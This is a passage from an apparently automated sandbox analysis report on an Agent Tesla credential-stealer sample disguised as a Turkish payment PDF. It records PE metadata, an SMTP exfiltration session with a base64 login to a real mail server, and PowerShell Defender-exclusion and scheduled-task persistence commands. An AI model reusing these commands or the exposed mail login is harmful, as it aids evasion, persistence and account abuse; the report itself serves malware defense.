                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xf32300x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xf1ac.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1040000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xf12840xf1400False0.942423291775data7.96404996685IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xf40000xf1ac0xf200False0.453141141529data5.82342552346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1040000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0xf42380x4436PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                      RT_ICON0xf86700x4228dBase III DBT, version number 0, next free block index 40
                                                      RT_ICON0xfc8980x25a8data
                                                      RT_ICON0xfee400x1a68data
                                                      RT_ICON0x1008a80x10a8data
                                                      RT_ICON0x1019500x988data
                                                      RT_ICON0x1022d80x6b8data
                                                      RT_ICON0x1029900x468GLS_BINARY_LSB_FIRST
                                                      RT_GROUP_ICON0x102df80x76data
                                                      RT_VERSION0x102e700x33cdata
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightWeenie Beenie
                                                      Assembly Version1.3.0.0
                                                      InternalNameX509Consta.exe
                                                      FileVersion1.3.0.0
                                                      CompanyNameWeenie Beenie
                                                      LegalTrademarks
                                                      Comments
                                                      ProductNameWallJumper
                                                      ProductVersion1.3.0.0
                                                      FileDescriptionWallJumper
                                                      OriginalFilenameX509Consta.exe
                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      04/20/22-15:08:27.762367 04/20/22-15:08:27.762367TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49748587192.168.2.678.135.65.4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 20, 2022 15:08:27.022226095 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.067656994 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.068234921 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.404874086 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.406069994 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.451375961 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.454237938 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.500376940 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.501123905 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.585231066 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.611521959 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.612634897 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.657922983 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.658658028 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.715603113 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.715970993 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.760582924 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.760616064 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.762367010 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.762640953 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.763597965 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.763705969 CEST49748587192.168.2.678.135.65.4
                                                      Apr 20, 2022 15:08:27.808006048 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.808032990 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.811774015 CEST5874974878.135.65.4192.168.2.6
                                                      Apr 20, 2022 15:08:27.867625952 CEST49748587192.168.2.678.135.65.4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 20, 2022 15:08:26.776765108 CEST5002953192.168.2.68.8.8.8
                                                      Apr 20, 2022 15:08:26.848242044 CEST53500298.8.8.8192.168.2.6
                                                      Apr 20, 2022 15:08:26.925826073 CEST5987153192.168.2.68.8.8.8
                                                      Apr 20, 2022 15:08:26.997186899 CEST53598718.8.8.8192.168.2.6
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Apr 20, 2022 15:08:26.776765108 CEST192.168.2.68.8.8.80x2c73Standard query (0)mail.yapaszincir.com.trA (IP address)IN (0x0001)
                                                      Apr 20, 2022 15:08:26.925826073 CEST192.168.2.68.8.8.80xf4d4Standard query (0)mail.yapaszincir.com.trA (IP address)IN (0x0001)
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Apr 20, 2022 15:08:26.848242044 CEST8.8.8.8192.168.2.60x2c73No error (0)mail.yapaszincir.com.tryapaszincir.com.trCNAME (Canonical name)IN (0x0001)
                                                      Apr 20, 2022 15:08:26.848242044 CEST8.8.8.8192.168.2.60x2c73No error (0)yapaszincir.com.tr78.135.65.4A (IP address)IN (0x0001)
                                                      Apr 20, 2022 15:08:26.997186899 CEST8.8.8.8192.168.2.60xf4d4No error (0)mail.yapaszincir.com.tryapaszincir.com.trCNAME (Canonical name)IN (0x0001)
                                                      Apr 20, 2022 15:08:26.997186899 CEST8.8.8.8192.168.2.60xf4d4No error (0)yapaszincir.com.tr78.135.65.4A (IP address)IN (0x0001)
                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Apr 20, 2022 15:08:27.404874086 CEST5874974878.135.65.4192.168.2.6220-cp04.hosting.sh.com.tr ESMTP Exim 4.94.2 #2 Wed, 20 Apr 2022 16:08:25 +0300
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 20, 2022 15:08:27.406069994 CEST49748587192.168.2.678.135.65.4EHLO 936905
                                                      Apr 20, 2022 15:08:27.451375961 CEST5874974878.135.65.4192.168.2.6250-cp04.hosting.sh.com.tr Hello 936905 [102.129.143.53]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPE_CONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 20, 2022 15:08:27.454237938 CEST49748587192.168.2.678.135.65.4AUTH login aW5mb0B5YXBhc3ppbmNpci5jb20udHI=
                                                      Apr 20, 2022 15:08:27.500376940 CEST5874974878.135.65.4192.168.2.6334 UGFzc3dvcmQ6
                                                      Apr 20, 2022 15:08:27.611521959 CEST5874974878.135.65.4192.168.2.6235 Authentication succeeded
                                                      Apr 20, 2022 15:08:27.612634897 CEST49748587192.168.2.678.135.65.4MAIL FROM:<info@yapaszincir.com.tr>
                                                      Apr 20, 2022 15:08:27.657922983 CEST5874974878.135.65.4192.168.2.6250 OK
                                                      Apr 20, 2022 15:08:27.658658028 CEST49748587192.168.2.678.135.65.4RCPT TO:<info@yapaszincir.com.tr>
                                                      Apr 20, 2022 15:08:27.715603113 CEST5874974878.135.65.4192.168.2.6250 Accepted
                                                      Apr 20, 2022 15:08:27.715970993 CEST49748587192.168.2.678.135.65.4DATA
                                                      Apr 20, 2022 15:08:27.760616064 CEST5874974878.135.65.4192.168.2.6354 Enter message, ending with "." on a line by itself
                                                      Apr 20, 2022 15:08:27.763705969 CEST49748587192.168.2.678.135.65.4.
                                                      Apr 20, 2022 15:08:27.811774015 CEST5874974878.135.65.4192.168.2.6250 OK id=1nhA4I-00043J-28

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:15:07:43
                                                      Start date:20/04/2022
                                                      Path:C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe"
                                                      Imagebase:0xc70000
                                                      File size:1051136 bytes
                                                      MD5 hash:55F4EDC3A387F831D2FEE28C7F6464D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.428463798.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.428463798.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      Target ID:2
                                                      Start time:15:08:00
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      Imagebase:0xf10000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:3
                                                      Start time:15:08:00
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6406f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:4
                                                      Start time:15:08:01
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OsAcNRt.exe
                                                      Imagebase:0xf10000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:5
                                                      Start time:15:08:02
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6406f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:7
                                                      Start time:15:08:03
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp
                                                      Imagebase:0xb00000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:8
                                                      Start time:15:08:05
                                                      Start date:20/04/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6406f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:9
                                                      Start time:15:08:09
                                                      Start date:20/04/2022
                                                      Path:C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe
                                                      Imagebase:0xfb0000
                                                      File size:1051136 bytes
                                                      MD5 hash:55F4EDC3A387F831D2FEE28C7F6464D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.415725263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.415725263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.624993533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.624993533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.414521460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.414521460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.413814549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.413814549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.415158758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.415158758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                      No disassembly